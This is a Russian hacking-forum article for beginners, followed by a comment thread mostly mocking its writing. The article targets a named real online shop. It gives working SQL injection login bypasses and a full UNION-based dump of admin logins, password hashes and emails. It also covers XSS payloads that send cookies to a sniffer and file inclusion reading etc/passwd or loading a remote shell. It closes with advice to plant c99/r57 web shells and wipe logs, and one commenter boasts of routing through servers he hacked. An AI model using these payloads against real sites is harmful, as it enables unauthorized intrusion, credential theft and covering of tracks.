Пополняем знания как искать баги! — HackZona.Ru

Пополняем знания как искать баги!

Пополняем знания как искать баги!

Тип статьи:
Со старой ХакЗоны.
Источник:
<Предисловие>
Всем привет! Не так давно я был нубом и нефига не умел, но у меня такое желание было научится, что я токо полгода изучаю хак и добился много чего! Сегодня я хочу новичкам рассказать как надо обращатся с сайтом!P.S Не судите строго это моя первая статья!</Предисловие>
Так поехали! Жертва станет shop.iskusnitsa.ru!
Первым делом мы ставим сайтег на какой-нить сканер, и сами начинаем проверять РУКАМИ!!! Начнем с обследования сайта.
1: НАПЯЛИВАЕМ ПРОКСИ!!! Элиту есть такая прога как proxyswitcher! Вот ее советую, т.к. сам юзаю! Потом заходим на 2ip.ru;leader.ru;myip.ru и проверяемся если написано, что типо это не настоящий айпи а роутера и т.п. то меняем а если все норм приступаем!
2: Так походим по сылкам посмотрим где что и как переменые передаются! Сделали.
3: Где админка находится(чаще всего /admin /manager /webroot /administration /administrator)И надо посмотреть /robots.txt на многих сайтах этот документ есть — там много что интересного!:) И пробуем /phpinfo.php Этот файлик хорош!:)Там тож много интересного
4: Пробуем такие фишки в логин как- ' or 1=1/*, ' or 'a'='a/*, admin'# Это SQL авторизация !admin'# Сайт читает все до ' а остальное отбрасывает как комент # есть еще коменты как /* —
5: Смотрим на XSS пишем в поиск {script}alert(){/script} или {font color=red}12331414414 Кароче если {script}alert(){/script} или {font color=red} не знаете что это обозначает то идем сюда google.ru и пишем ХТМЛ основы! Потом JS основы! Вот а если вы поняли эти строки то двигаемся дальше!5(а)Если выскочила табличка или поменялись цвета, то пишем {script}СНИФЕР+document.cookie{/script}Снифер онлайн лучше я думаю:)Hacker-pro.net xaknet.ru Там раздел сниферы! так полученный результат в поиске суем админу чтоб он зашел на эту страницу ТАК это называется ПАССИВКА XSS!МОжно, если в коментах XSS то там тоже ставим снифер, А ЭТО УЖЕ АКТИВНАЯ XSS! Кто понял различие:)? Красава! Пасивку мы кидаем жертве, а активную она сама зайдет будь это коменты или гостевухы и т.п.!
6: Если где-нибудь находим переменные и т.п. типа ...../index.php?p=чему-нибудь то пробуем место чего-нибудь поставить sdfspfjscmawe Если выпадает ошибка Warning:include… это PHP-include! Бывают локальные и обычный 6(а): Если локальный то можно смотреть дирректорие! Например:index.php?p=etc/passwd Очень часто сервер сам приписывает .php .html .shtml .phtml и т.п. Надо это убрать! А как? Просто в природе есть Ядовитые нули или NULL-byte %00 он отсекает остальное ТО ЕСТЬ index.php=etc/passwd%00, ../-вверх дир! А если у нас не локальная, а обычная -6(б) то делаем так index.php?p=наш сайт.ru/shell.php(заметьте что успешность зависит от шелла)Если о5 же Сайт приписывает .php… То мы указываем без оканчания шелла смотрим index.php?p=http://xakep.narod.ru/shell и все, а если не приписывает то так index.php?p=http://xakep.narod.ru/shell.phpСовет: регайся на народе! И там разводи шелики! Совет: ЮЗАЙ С99 | R57 Самое то!(Commands: cat -Просмотр чего-то(исходник) find(найти) ls(просмотр директорий) ls впринципе тебе не надо будет:) id-просмотр своих прав вот основные комманды)Совет: На народе я нашел что-то типо антибан за вирусы и т.п. в нашем случае шелл шелл-это типо можно считать бэкдор! Система народа агрится на c99.php r57.php shell.php Попробуй переименовать на adjklkx.php!
Далее-
7: Попробуем в поиск поставить следущее aa') Ииииииииииииии хопачки! Вы дало скулю! Это хорошо самая распространенная бага:)
8: Пишем следущее aa') order by 10/* (Нигде не ставим + друзья новички это мы ставим токо в адресной строки! )! Так страница загрузилась! Идем дальше!aa') order by 20/*Ошибка берем 15! aa') order by 13/*Отобразилась терь истина 14!aa') order by 14/*Ошибка значит 13полей! Делаем такой запросик aa') union select 1,2,3,4,5,6,7,8,9,10,11,12,13/*Видим 3 4 5 выводимые поля! Теперь узнаем версию БД это у нас VERSION() aa') union select 1,2,3,VERSION(),5,6,7,8,9,10,11,12,13/*Ггггг НОВИЧКИ не хватает места НАДО ЛЕЗТЬ В СУРС страницы и искать поиск и там найдете maxlength=50 50 меняете на 9000! Терь все норм и видим что -5 версия =>есть шема! Делаем такой запрос aa') union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13 from information_schema.tables/*Листаем и видим SITE_admin! Теперь мы делаем последний запросик aa') union select 1,2,login,password,email,6,7,8,9,10,11,12,13 from site_admin/*Ух ты 2админа 1стандарт manager а другой дядько лох)))))и там их хеши! И ящики! И логины! Такася идем на google.com и вбиваем passwordpro и скачиваем, а у кого есть не надо! Так вставляем хеш! И ура у нас ПАСС от админки! Терь заходим в админку заливаем шелл! И чистим логи(со своим айпи — прокси)
P.S Новички не надо лишних вопросов про SQL XSS PHP есть товарищ как ГУГЛ:)===================================================== -q3rl0w- ДЛЯ НОВИЧКОВ!=====================================================При копирование копируйте ВСЕ!
Нравится
Не нравится

51 комментарий

08:56
Это ппц. Я в шоке...
Статья не то чтобы нуждается в редактировании, она вообще состоит из каламбура.
09:20
Статья ниочем и самое главное для чего? Новичок прочитав это, только запутается! Статья НЕ полная, и недочетов просто уйма! Блин парень рано тебе в ЛУМ, даже в следующем месяце гг несколько вопросов:
1) Объясни новичкам, почему в поиск мы вставляем именно aa') а не просто к примеру ' или fgdgf' xDD
2) О_о че такое шема?)))
3) >Совет:ЮЗАЙ С99 | R57
Еще какие-нибудь знаешь?
4) PHP-include: если к примеру изначально заданна папка инклудаемого файла, че делать будешь?)
5)>в нашем случае шелл шелл-это типо можно считать бэкдор!
Пиздец!!!
6) насчет того как мы крутим скулю, это ваще пиндец, а если оракл вертится или PG к примеру?
7)>Не так давно я был нубом и нефига не умел, но у меня такое желание было научится, что я токо полгода изучаю хак и добился много чего!
------------------------------------------------------------------------
Ну сейчас то ты уже стал гуру?

Итог: Если это все чему ты научился за пол года, мда, скудновато кароч...
09:23
блин хотьбы форматирования нормальное было. я пока читал у меня чуть правый глаз не выпал
09:25
Оценивем статью, друзья, не стесняемся...
09:29
я как бы понимаю, автор хочет показать свои знания. Но. Это банальщина, такого много
10:44
Автор отпишись)
13:29
Добавил: fraIzer. Добавлено: 26.08.2009.
Ты какой-то ебать странный))))
3) >Совет:ЮЗАЙ С99 | R57
Еще какие-нибудь знаешь----пиздец я ебнулся со стула)))если чесно когда прочитал!Ты слепой???Совет:ЮЗАЙ С99 | R57 ВИДИШЬ СЛОВО СОВЕТ?пиздец)))xDА так на тебе !36antichat-shell! !ak-47shell ! typlssSHELL!С99 r57 самые легкие для новичко!А что ты им посоветуешь комадной строкой юзать?xDтак епт следущее что меня убило в твоем посту!Это 6xD ну трындец! полный)))))):Dахахаха епт ты сайте iskusnitsa.ru ты там крутил скулю?если нет то что брехню пишешь?и хоть если да!НОВИЧКАМ ЕСЛИ ИНТЕРЕСНО ТО ОНИ НАЙДУТ ПРО СКУЛИ!!!И ПРО ВСЕ ЧТО ИНТЕРЕСНО!
13:31
на этом портале их полно!
14:16
пацана.... если честно мой мозг был взорван еще при прочтении... но когда я увидел ответ на комментарий fraIzer я понял, что тут не в редактировании дело. он просто так пишит. и не дай бог так же говорит........ ппц. давно такое на хз не видел
14:17
!НОВИЧКАМ ЕСЛИ ИНТЕРЕСНО ТО ОНИ НАЙДУТ ПРО СКУЛИ!!!И ПРО ВСЕ ЧТО ИНТЕРЕСНО....
извини за грубость, но этот ответ похож на ответ блондина......
14:28
аффтару стращщно xDDD
14:29
Ну хз токо ламеры не найдут то что им надо!Если ты из них понятно......
14:39
я ламер!! я ни хочу вот так !НОВИЧКАМ ЕСЛИ ИНТЕРЕСНО ТО ОНИ НАЙДУТ ПРО СКУЛИ!!!И ПРО ВСЕ ЧТО ИНТЕРЕСНО....
убейте меня?
14:39
Рейтинг статьи - 1.8
Голоса:
1 - 1 балл
2 - 1 балл
3 - 1 балл
4 - 1 балл
5 - 5 балл
Итого средний = 1.8

З.Ы. Угадайте кто поставил 5 ?!! )
14:40
я могу я могу)))
14:41
нука нука....
14:42
это полюбому : fraIzer
у них вроде приятельские отношение сложились))))))))))))))))
15:17
>Ну хз токо ламеры не найдут то что им надо!Если ты из них понятно......
ну епень. началось. все ламмеры я один умный.
Блин почему ты не умеешь принимать критику. ЕСли статья не очень так и пойми это. Анализируй свои ошибки ит.п.
16:16
-q3rl0w-, мне не нужны твои xDD, я задал тебе несколько вопросов, как к автору статьи, ты мне можешь на них ответить по порядку?
И во вторых я не слепой и не странный, лучше не начинай, просто совет...
Насчет того, что новички найдут все в гугле, вот и я о чем, зачем мне к примеру читать твою статью, если я гляну в гугл и найду 100 статей на данную тему с значительно лучшим расскрытием темы?
Не думай, что я хочу обосрать твою статью, просто если ты собрался писать, значит, ты считаешь себя компитентным в данном вопроссе, а раз уж так, то держи критику и радуйся, что твоей статье уделили столько внимания, объективно она этого не заслуживает...
16:44
kazin8?, не надо говорить что ты ламер, как лодку назовёшь так она и поплывет. Оптимизма больше и больше занимайся полезным)
Насчёт статьи, пробелов не хватает, сплющили всё в лепешку, наверно нормально, потом почитаю.
16:55
>я ламер!! я ни хочу вот так !НОВИЧКАМ ЕСЛИ ИНТЕРЕСНО ТО ОНИ НАЙДУТ ПРО СКУЛИ!!!И ПРО ВСЕ ЧТО ИНТЕРЕСНО....
убейте меня?
------------------------------------------------------------------------
Убьём и ты станеш легендо)))

>наверно нормально, потом почитаю.
Ну да походу нихуя) потом подумаю)))
16:55
orhideus Ииииииииииииии хопачки!Вы дало скулю!
как это можно норм называть? А вообще.... кто-то должен следить, чтобы статьи проходили редакцию
17:22
>А вообще.... кто-то должен следить, чтобы статьи проходили редакцию
гг Проверил: shurmann., цензоров нема совсем
17:27
Давно хотел стать цензором. Вот тока постоянного ИПа нет. А так бы я кое чо редактил и выкидывал....
20:33
Кто это вообще пропустил???!!!!
20:39
Александр)
21:07
>Давно хотел стать цензором. Вот тока постоянного ИПа нет. А так бы я кое чо редактил и выкидывал....
из за этого мну и не взяли (
00:28
> Вот тока постоянного ИПа нет
было бы желание. если я не ошибуюсь есть множество сервисов, предоставляющих постоянный ип) так что...
15:39
>было бы желание. если я не ошибуюсь есть множество сервисов, предоставляющих постоянный ип) так что...
угу есть...
20:05
бррр, без n -ов я это прочесть не смогу
20:06
слеш n -ов =/
23:36
йа парсер)) ыыы
23:38
у мя постоянный ип, но цензором вряд ли возьмут)
13:01
Народ юзайте для анонимности TOR)
13:04
4erteg убейся лбом ап стенку)
13:14
хзчую
тор нетру
12:16
TOR побаще прокси будет...
14:01
>TOR побаще прокси будет...
кхе кхе
14:02
автор отпишется или нет?
18:49
Не вижу смысла тор!Почему?Потому, что по-мойму(как мне кажется)там следят за запросами в сеть инета!Я хз, я пользуюсь сокс на взломанных мной серверах, и чищу логи подключений и т.п.
18:57
это же не для хакеров создан)))))
19:54
Ты бы лучше по сабжу ответил!!!
00:18
автор ты русский? я чет твою речь не понимаю
17:57
ммдаа...автор жжет)убейся Ап СтЕнКу!Баян.
14:11
Дело не в том что боян) дело в полной некомпетентности автора по вопросу, которому написанна статья...
21:42
Фак...как вы это прочитали вообще? =) глаза ломаються...Хоть бы на абзацы разбил.
02:58
Новичкам лучше Флёнова Веб сервер глазами хакера
15:10
ТЫ бы ещё поставил жирный курсив, и всё зачеркнул =))) читать нереал особенно с моим зрением))
12:33
Щас я буду задавать вопросы по теме:
1) Что токое прокси ?
2) В смысле ставим на кокой нибудь сканер ?

Пока это самое основное, потом еще буду задовать.
14:51
t1nda
1)proxy это => http://www.fssr.ru/hz.php?name=News&file=article&sid=8033 => http://www.google.ru/
2) набирай в инете " сканер безопасности" или "сканер портов" ....установка... и тупо выберешь свой сайт(который ты хочешь ломать) или его ip
и жмешься на кнопку |>
14:56
статья тянет на Хорошо !!! я понял всё (потому что читал все статьи по всем 8 темам), но половина 8-го пункт это ппц
его как будто разнесло :D

P.S. срок обучения такое-же как у него))